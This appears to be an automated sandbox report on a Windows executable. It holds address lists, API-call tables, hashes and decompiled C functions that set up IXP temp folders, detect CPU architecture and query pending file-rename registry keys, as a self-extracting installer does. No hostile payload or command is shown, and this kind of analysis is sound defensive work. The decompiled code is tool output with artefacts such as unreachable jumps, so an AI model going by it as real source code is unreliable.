                                                                                                                                                                                                        0x001f4628
                                                                                                                                                                                                        0x001f45cd
                                                                                                                                                                                                        0x001f45cd
                                                                                                                                                                                                        0x001f45cf
                                                                                                                                                                                                        0x001f45cf
                                                                                                                                                                                                        0x001f45d2
                                                                                                                                                                                                        0x001f45d2
                                                                                                                                                                                                        0x001f45d4
                                                                                                                                                                                                        0x001f45d5
                                                                                                                                                                                                        0x001f45db
                                                                                                                                                                                                        0x001f45de
                                                                                                                                                                                                        0x001f45e3
                                                                                                                                                                                                        0x001f45e9
                                                                                                                                                                                                        0x001f45ed
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f45f3
                                                                                                                                                                                                        0x001f45fd
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f4602
                                                                                                                                                                                                        0x001f45ed
                                                                                                                                                                                                        0x001f457e
                                                                                                                                                                                                        0x001f457e
                                                                                                                                                                                                        0x001f4580
                                                                                                                                                                                                        0x001f4580
                                                                                                                                                                                                        0x001f4583
                                                                                                                                                                                                        0x001f4583
                                                                                                                                                                                                        0x001f4585
                                                                                                                                                                                                        0x001f4586
                                                                                                                                                                                                        0x001f458a
                                                                                                                                                                                                        0x001f458c
                                                                                                                                                                                                        0x001f458f
                                                                                                                                                                                                        0x001f458f
                                                                                                                                                                                                        0x001f4591
                                                                                                                                                                                                        0x001f4592
                                                                                                                                                                                                        0x001f459b
                                                                                                                                                                                                        0x001f459e
                                                                                                                                                                                                        0x001f45a3
                                                                                                                                                                                                        0x001f45a9
                                                                                                                                                                                                        0x001f45ad
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f45af
                                                                                                                                                                                                        0x001f45af
                                                                                                                                                                                                        0x001f45bf
                                                                                                                                                                                                        0x001f462d
                                                                                                                                                                                                        0x001f4630
                                                                                                                                                                                                        0x001f463d
                                                                                                                                                                                                        0x001f464e
                                                                                                                                                                                                        0x001f464e
                                                                                                                                                                                                        0x001f463f
                                                                                                                                                                                                        0x001f4640
                                                                                                                                                                                                        0x001f4647
                                                                                                                                                                                                        0x001f464c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f464c
                                                                                                                                                                                                        0x001f4666
                                                                                                                                                                                                        0x001f466d
                                                                                                                                                                                                        0x001f466f
                                                                                                                                                                                                        0x001f4675
                                                                                                                                                                                                        0x001f4675
                                                                                                                                                                                                        0x001f45ad
                                                                                                                                                                                                        0x001f4527
                                                                                                                                                                                                        0x001f452e
                                                                                                                                                                                                        0x001f453f
                                                                                                                                                                                                        0x001f453f
                                                                                                                                                                                                        0x001f4530
                                                                                                                                                                                                        0x001f4531
                                                                                                                                                                                                        0x001f4538
                                                                                                                                                                                                        0x001f453d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f453d
                                                                                                                                                                                                        0x001f4554
                                                                                                                                                                                                        0x001f455a
                                                                                                                                                                                                        0x001f455a
                                                                                                                                                                                                        0x001f455a
                                                                                                                                                                                                        0x001f4525
                                                                                                                                                                                                        0x001f468c

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 001F4518
                                                                                                                                                                                                        • MessageBoxA.USER32(?,?,cent,00010010), ref: 001F4554
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000065), ref: 001F45A3
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000065), ref: 001F45E3
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000002), ref: 001F460D
                                                                                                                                                                                                        • MessageBeep.USER32(00000000), ref: 001F4630
                                                                                                                                                                                                        • MessageBoxA.USER32(?,00000000,cent,00000000), ref: 001F4666
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 001F466F
                                                                                                                                                                                                          • Part of subcall function 001F681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 001F686E
                                                                                                                                                                                                          • Part of subcall function 001F681F: GetSystemMetrics.USER32(0000004A), ref: 001F68A7
                                                                                                                                                                                                          • Part of subcall function 001F681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 001F68CC
                                                                                                                                                                                                          • Part of subcall function 001F681F: RegQueryValueExA.ADVAPI32(?,001F1140,00000000,?,?,0000000C), ref: 001F68F4
                                                                                                                                                                                                          • Part of subcall function 001F681F: RegCloseKey.ADVAPI32(?), ref: 001F6902
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
                                                                                                                                                                                                        • String ID: LoadString() Error. Could not load string resource.$cent
                                                                                                                                                                                                        • API String ID: 3244514340-2605220145
                                                                                                                                                                                                        • Opcode ID: aba231cb981afcd34225b7291afa5cd34357a6425793fd6a476eed4f57c56175
                                                                                                                                                                                                        • Instruction ID: 161fb68f0c408c7d8dc63c6fdd95f29fb8a4f4247229577395497e5f2a1d69df
                                                                                                                                                                                                        • Opcode Fuzzy Hash: aba231cb981afcd34225b7291afa5cd34357a6425793fd6a476eed4f57c56175
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2B51F4B290021DAFDB21AF28CC48BBB7B69EF85310F054194FE49A7251DB35DE45CBA0
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        C-Code - Quality: 95%
                                                                                                                                                                                                        			E001F53A1(CHAR* __ecx, CHAR* __edx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t5;
                                                                                                                                                                                                        				long _t13;
                                                                                                                                                                                                        				int _t14;
                                                                                                                                                                                                        				CHAR* _t20;
                                                                                                                                                                                                        				int _t29;
                                                                                                                                                                                                        				int _t30;
                                                                                                                                                                                                        				CHAR* _t32;
                                                                                                                                                                                                        				signed int _t33;
                                                                                                                                                                                                        				void* _t34;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t5 =  *0x1f8004; // 0xfcdc6e1a
                                                                                                                                                                                                        				_v8 = _t5 ^ _t33;
                                                                                                                                                                                                        				_t32 = __edx;
                                                                                                                                                                                                        				_t20 = __ecx;
                                                                                                                                                                                                        				_t29 = 0;
                                                                                                                                                                                                        				while(1) {
                                                                                                                                                                                                        					E001F171E( &_v268, 0x104, "IXP%03d.TMP", _t29);
                                                                                                                                                                                                        					_t34 = _t34 + 0x10;
                                                                                                                                                                                                        					_t29 = _t29 + 1;
                                                                                                                                                                                                        					E001F1680(_t32, 0x104, _t20);
                                                                                                                                                                                                        					E001F658A(_t32, 0x104,  &_v268); // executed
                                                                                                                                                                                                        					RemoveDirectoryA(_t32); // executed
                                                                                                                                                                                                        					_t13 = GetFileAttributesA(_t32); // executed
                                                                                                                                                                                                        					if(_t13 == 0xffffffff) {
                                                                                                                                                                                                        						break;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if(_t29 < 0x190) {
                                                                                                                                                                                                        						continue;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					L3:
                                                                                                                                                                                                        					_t30 = 0;
                                                                                                                                                                                                        					if(GetTempFileNameA(_t20, "IXP", 0, _t32) != 0) {
                                                                                                                                                                                                        						_t30 = 1;
                                                                                                                                                                                                        						DeleteFileA(_t32);
                                                                                                                                                                                                        						CreateDirectoryA(_t32, 0);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					L5:
                                                                                                                                                                                                        					return E001F6CE0(_t30, _t20, _v8 ^ _t33, 0x104, _t30, _t32);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t14 = CreateDirectoryA(_t32, 0); // executed
                                                                                                                                                                                                        				if(_t14 == 0) {
                                                                                                                                                                                                        					goto L3;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t30 = 1;
                                                                                                                                                                                                        				 *0x1f8a20 = 1;
                                                                                                                                                                                                        				goto L5;
                                                                                                                                                                                                        			}

















                                                                                                                                                                                                        0x001f53ac
                                                                                                                                                                                                        0x001f53b3
                                                                                                                                                                                                        0x001f53b9
                                                                                                                                                                                                        0x001f53bb
                                                                                                                                                                                                        0x001f53bd
                                                                                                                                                                                                        0x001f53bf
                                                                                                                                                                                                        0x001f53d1
                                                                                                                                                                                                        0x001f53d6
                                                                                                                                                                                                        0x001f53e0
                                                                                                                                                                                                        0x001f53e2
                                                                                                                                                                                                        0x001f53f5
                                                                                                                                                                                                        0x001f53fb
                                                                                                                                                                                                        0x001f5402
                                                                                                                                                                                                        0x001f540b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f5413
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f5415
                                                                                                                                                                                                        0x001f5416
                                                                                                                                                                                                        0x001f5427
                                                                                                                                                                                                        0x001f542a
                                                                                                                                                                                                        0x001f542b
                                                                                                                                                                                                        0x001f5434
                                                                                                                                                                                                        0x001f5434
                                                                                                                                                                                                        0x001f543a
                                                                                                                                                                                                        0x001f544c
                                                                                                                                                                                                        0x001f544c
                                                                                                                                                                                                        0x001f5452
                                                                                                                                                                                                        0x001f545a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f545e
                                                                                                                                                                                                        0x001f545f
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 001F171E: _vsnprintf.MSVCRT ref: 001F1750
                                                                                                                                                                                                        • RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 001F53FB
                                                                                                                                                                                                        • GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 001F5402
                                                                                                                                                                                                        • GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 001F541F
                                                                                                                                                                                                        • DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 001F542B
                                                                                                                                                                                                        • CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 001F5434
                                                                                                                                                                                                        • CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 001F5452
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$IXP$IXP%03d.TMP
                                                                                                                                                                                                        • API String ID: 1082909758-7194216
                                                                                                                                                                                                        • Opcode ID: a82fe64cc9da819c559c8f87838b5df1d464b718900b6272e469528e8ec99ee0
                                                                                                                                                                                                        • Instruction ID: 83e1796447c258cf4f85f96c13c419568b69c3480777d7561ecff5d5439d2c32
                                                                                                                                                                                                        • Opcode Fuzzy Hash: a82fe64cc9da819c559c8f87838b5df1d464b718900b6272e469528e8ec99ee0
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 851127B130050877D3209B36AC49FBF3A6EEFD1321F400125F74AD2590DF788982C6A1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 522 1f5467-1f5484 523 1f551c-1f5528 call 1f1680 522->523 524 1f548a-1f5490 call 1f53a1 522->524 528 1f552d-1f5539 call 1f58c8 523->528 527 1f5495-1f5497 524->527 529 1f549d-1f54c0 call 1f1781 527->529 530 1f5581-1f5583 527->530 537 1f554d-1f5552 528->537 538 1f553b-1f5545 CreateDirectoryA 528->538 539 1f550c-1f551a call 1f658a 529->539 540 1f54c2-1f54d8 GetSystemInfo 529->540 533 1f558d-1f559d call 1f6ce0 530->533 544 1f5585-1f558b 537->544 545 1f5554-1f5557 call 1f597d 537->545 542 1f5577-1f557c call 1f6285 538->542 543 1f5547 538->543 539->528 548 1f54fe 540->548 549 1f54da-1f54dd 540->549 542->530 543->537 544->533 551 1f555c-1f555e 545->551 552 1f5503-1f5507 call 1f658a 548->552 555 1f54df-1f54e2 549->555 556 1f54f7-1f54fc 549->556 551->544 557 1f5560-1f5566 551->557 552->539 559 1f54e4-1f54e7 555->559 560 1f54f0-1f54f5 555->560 556->552 557->530 561 1f5568-1f5575 RemoveDirectoryA 557->561 559->539 562 1f54e9-1f54ee 559->562 560->552 561->530 562->552
                                                                                                                                                                                                        C-Code - Quality: 75%
                                                                                                                                                                                                        			E001F5467(CHAR* __ecx, void* __edx, char* _a4) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				struct _SYSTEM_INFO _v304;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t10;
                                                                                                                                                                                                        				void* _t13;
                                                                                                                                                                                                        				intOrPtr _t14;
                                                                                                                                                                                                        				void* _t16;
                                                                                                                                                                                                        				void* _t20;
                                                                                                                                                                                                        				signed int _t26;
                                                                                                                                                                                                        				void* _t28;
                                                                                                                                                                                                        				void* _t29;
                                                                                                                                                                                                        				CHAR* _t48;
                                                                                                                                                                                                        				signed int _t49;
                                                                                                                                                                                                        				intOrPtr _t61;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t10 =  *0x1f8004; // 0xfcdc6e1a
                                                                                                                                                                                                        				_v8 = _t10 ^ _t49;
                                                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                                                        				if(__edx == 0) {
                                                                                                                                                                                                        					_t48 = 0x1f91e4;
                                                                                                                                                                                                        					_t42 = 0x104;
                                                                                                                                                                                                        					E001F1680(0x1f91e4, 0x104);
                                                                                                                                                                                                        					L14:
                                                                                                                                                                                                        					_t13 = E001F58C8(_t48); // executed
                                                                                                                                                                                                        					if(_t13 != 0) {
                                                                                                                                                                                                        						L17:
                                                                                                                                                                                                        						_t42 = _a4;
                                                                                                                                                                                                        						if(_a4 == 0) {
                                                                                                                                                                                                        							L23:
                                                                                                                                                                                                        							 *0x1f9124 = 0;
                                                                                                                                                                                                        							_t14 = 1;
                                                                                                                                                                                                        							L24:
                                                                                                                                                                                                        							return E001F6CE0(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t16 = E001F597D(_t48, _t42, 1, 0); // executed
                                                                                                                                                                                                        						if(_t16 != 0) {
                                                                                                                                                                                                        							goto L23;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t61 =  *0x1f8a20; // 0x0
                                                                                                                                                                                                        						if(_t61 != 0) {
                                                                                                                                                                                                        							 *0x1f8a20 = 0;
                                                                                                                                                                                                        							RemoveDirectoryA(_t48);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						L22:
                                                                                                                                                                                                        						_t14 = 0;
                                                                                                                                                                                                        						goto L24;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if(CreateDirectoryA(_t48, 0) == 0) {
                                                                                                                                                                                                        						 *0x1f9124 = E001F6285();
                                                                                                                                                                                                        						goto L22;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					 *0x1f8a20 = 1;
                                                                                                                                                                                                        					goto L17;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t42 =  &_v268;
                                                                                                                                                                                                        				_t20 = E001F53A1(__ecx,  &_v268); // executed
                                                                                                                                                                                                        				if(_t20 == 0) {
                                                                                                                                                                                                        					goto L22;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                                                        				_t48 = 0x1f91e4;
                                                                                                                                                                                                        				E001F1781(0x1f91e4, 0x104, __ecx,  &_v268);
                                                                                                                                                                                                        				if(( *0x1f9a34 & 0x00000020) == 0) {
                                                                                                                                                                                                        					L12:
                                                                                                                                                                                                        					_t42 = 0x104;
                                                                                                                                                                                                        					E001F658A(_t48, 0x104, 0x1f1140);
                                                                                                                                                                                                        					goto L14;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				GetSystemInfo( &_v304);
                                                                                                                                                                                                        				_t26 = _v304.dwOemId & 0x0000ffff;
                                                                                                                                                                                                        				if(_t26 == 0) {
                                                                                                                                                                                                        					_push("i386");
                                                                                                                                                                                                        					L11:
                                                                                                                                                                                                        					E001F658A(_t48, 0x104);
                                                                                                                                                                                                        					goto L12;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t28 = _t26 - 1;
                                                                                                                                                                                                        				if(_t28 == 0) {
                                                                                                                                                                                                        					_push("mips");
                                                                                                                                                                                                        					goto L11;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t29 = _t28 - 1;
                                                                                                                                                                                                        				if(_t29 == 0) {
                                                                                                                                                                                                        					_push("alpha");
                                                                                                                                                                                                        					goto L11;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(_t29 != 1) {
                                                                                                                                                                                                        					goto L12;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_push("ppc");
                                                                                                                                                                                                        				goto L11;
                                                                                                                                                                                                        			}




















                                                                                                                                                                                                        0x001f5472
                                                                                                                                                                                                        0x001f5479
                                                                                                                                                                                                        0x001f5481
                                                                                                                                                                                                        0x001f5484
                                                                                                                                                                                                        0x001f551c
                                                                                                                                                                                                        0x001f5521
                                                                                                                                                                                                        0x001f5528
                                                                                                                                                                                                        0x001f552d
                                                                                                                                                                                                        0x001f552f
                                                                                                                                                                                                        0x001f5539
                                                                                                                                                                                                        0x001f554d
                                                                                                                                                                                                        0x001f554d
                                                                                                                                                                                                        0x001f5552
                                                                                                                                                                                                        0x001f5585
                                                                                                                                                                                                        0x001f5585
                                                                                                                                                                                                        0x001f558b
                                                                                                                                                                                                        0x001f558d
                                                                                                                                                                                                        0x001f559d
                                                                                                                                                                                                        0x001f559d
                                                                                                                                                                                                        0x001f5557
                                                                                                                                                                                                        0x001f555e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f5560
                                                                                                                                                                                                        0x001f5566
                                                                                                                                                                                                        0x001f5569
                                                                                                                                                                                                        0x001f556f
                                                                                                                                                                                                        0x001f556f
                                                                                                                                                                                                        0x001f5581
                                                                                                                                                                                                        0x001f5581
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f5581
                                                                                                                                                                                                        0x001f5545
                                                                                                                                                                                                        0x001f557c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f557c
                                                                                                                                                                                                        0x001f5547
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f5547
                                                                                                                                                                                                        0x001f548a
                                                                                                                                                                                                        0x001f5490
                                                                                                                                                                                                        0x001f5497
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f549d
                                                                                                                                                                                                        0x001f54ab
                                                                                                                                                                                                        0x001f54b4
                                                                                                                                                                                                        0x001f54c0
                                                                                                                                                                                                        0x001f550c
                                                                                                                                                                                                        0x001f5511
                                                                                                                                                                                                        0x001f5515
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f5515
                                                                                                                                                                                                        0x001f54c9
                                                                                                                                                                                                        0x001f54d6
                                                                                                                                                                                                        0x001f54d8
                                                                                                                                                                                                        0x001f54fe
                                                                                                                                                                                                        0x001f5503
                                                                                                                                                                                                        0x001f5507
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f5507
                                                                                                                                                                                                        0x001f54da
                                                                                                                                                                                                        0x001f54dd
                                                                                                                                                                                                        0x001f54f7
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f54f7
                                                                                                                                                                                                        0x001f54df
                                                                                                                                                                                                        0x001f54e2
                                                                                                                                                                                                        0x001f54f0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f54f0
                                                                                                                                                                                                        0x001f54e7
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f54e9
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 001F54C9
                                                                                                                                                                                                        • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 001F553D
                                                                                                                                                                                                        • RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 001F556F
                                                                                                                                                                                                          • Part of subcall function 001F53A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 001F53FB
                                                                                                                                                                                                          • Part of subcall function 001F53A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 001F5402
                                                                                                                                                                                                          • Part of subcall function 001F53A1: GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 001F541F
                                                                                                                                                                                                          • Part of subcall function 001F53A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 001F542B
                                                                                                                                                                                                          • Part of subcall function 001F53A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 001F5434
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$alpha$i386$mips$ppc
                                                                                                                                                                                                        • API String ID: 1979080616-3696344869
                                                                                                                                                                                                        • Opcode ID: bd8b7901fa430042df5c623979847ac96d0c3d6e30a025b5ad7eeac83a21414a
                                                                                                                                                                                                        • Instruction ID: 6da8dc18a3d25e237d5ad6d722a5cc851bd1fe4b28a17381bdfb816c3d85f500
                                                                                                                                                                                                        • Opcode Fuzzy Hash: bd8b7901fa430042df5c623979847ac96d0c3d6e30a025b5ad7eeac83a21414a
                                                                                                                                                                                                        • Instruction Fuzzy Hash: FE31F7B1B00A1DABCF14EF399C44A7E779BAF91350B14012ABB06D3960DF70CE42C695
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 563 1f256d-1f257d 564 1f2583-1f2589 563->564 565 1f2622-1f2627 call 1f24e0 563->565 567 1f258b 564->567 568 1f25e8-1f2607 RegOpenKeyExA 564->568 570 1f2629-1f262f 565->570 567->570 571 1f2591-1f2595 567->571 572 1f2609-1f2620 RegQueryInfoKeyA 568->572 573 1f25e3-1f25e6 568->573 571->570 575 1f259b-1f25ba RegOpenKeyExA 571->575 574 1f25d1-1f25dd RegCloseKey 572->574 573->570 574->573 575->573 576 1f25bc-1f25cb RegQueryValueExA 575->576 576->574
                                                                                                                                                                                                        C-Code - Quality: 86%
                                                                                                                                                                                                        			E001F256D(signed int __ecx) {
                                                                                                                                                                                                        				int _v8;
                                                                                                                                                                                                        				void* _v12;
                                                                                                                                                                                                        				signed int _t13;
                                                                                                                                                                                                        				signed int _t19;
                                                                                                                                                                                                        				long _t24;
                                                                                                                                                                                                        				void* _t26;
                                                                                                                                                                                                        				int _t31;
                                                                                                                                                                                                        				void* _t34;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                                                        				_t13 = __ecx & 0x0000ffff;
                                                                                                                                                                                                        				_t31 = 0;
                                                                                                                                                                                                        				if(_t13 == 0) {
                                                                                                                                                                                                        					_t31 = E001F24E0(_t26);
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t34 = _t13 - 1;
                                                                                                                                                                                                        					if(_t34 == 0) {
                                                                                                                                                                                                        						_v8 = 0;
                                                                                                                                                                                                        						if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {
                                                                                                                                                                                                        							goto L7;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);
                                                                                                                                                                                                        							goto L6;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						L12:
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						if(_t34 > 0 && __ecx <= 3) {
                                                                                                                                                                                                        							_v8 = 0;
                                                                                                                                                                                                        							_t24 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
                                                                                                                                                                                                        							if(_t24 == 0) {
                                                                                                                                                                                                        								_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed
                                                                                                                                                                                                        								L6:
                                                                                                                                                                                                        								asm("sbb eax, eax");
                                                                                                                                                                                                        								_v8 = _v8 &  !( ~_t19);
                                                                                                                                                                                                        								RegCloseKey(_v12); // executed
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							L7:
                                                                                                                                                                                                        							_t31 = _v8;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return _t31;
                                                                                                                                                                                                        				goto L12;
                                                                                                                                                                                                        			}











                                                                                                                                                                                                        0x001f2572
